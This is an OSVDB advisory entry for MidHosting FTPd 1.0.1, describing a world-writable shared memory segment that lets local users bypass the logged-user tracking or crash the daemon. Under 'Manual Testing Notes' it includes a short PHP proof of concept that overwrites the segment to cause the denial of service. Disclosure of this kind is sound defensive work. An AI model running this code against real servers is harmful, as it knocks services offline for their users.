MidHosting FTPD DoS

2003-06-18T03:18:13
ID OSVDB:2182
Type osvdb
Reporter OSVDB
Modified 2003-06-18T03:18:13

Description

Vulnerability Description

MidHosting FTPd 1.0.1 contains a flaw when the option to track logged users is enabled. This will allow a local attacker to bypass this restriction or cause a denial of service.

Technical Description

The list of currently logged users is kept in a public SysV shared memory segment. This segment and the related locking semaphore are world readable and world writable. Non null-terminated user names will immediately cause a denial of service.

Solution Description

Reinstall version 1.0.1. Although the version information did not change the vendor has fixed the issue.

Short Description

MidHosting FTPd 1.0.1 contains a flaw when the option to track logged users is enabled. This will allow a local attacker to bypass this restriction or cause a denial of service.

Manual Testing Notes

<?php

mhftpd denial of service

define('SHMSIZE', 16384);

if (($shmid = shmop_open(ftok('/tmp', 'U'), 'w', 0777, SHMSIZE)) == -1) { die(); } shmop_write($shmid, str_repeat('A', SHMSIZE), 0);

?>

References:

Secunia Advisory ID:9074 ISS X-Force ID: 12370 Generic Informational URL: http://freeware.tversu.ru/mhftpd/ Bugtraq ID: 7956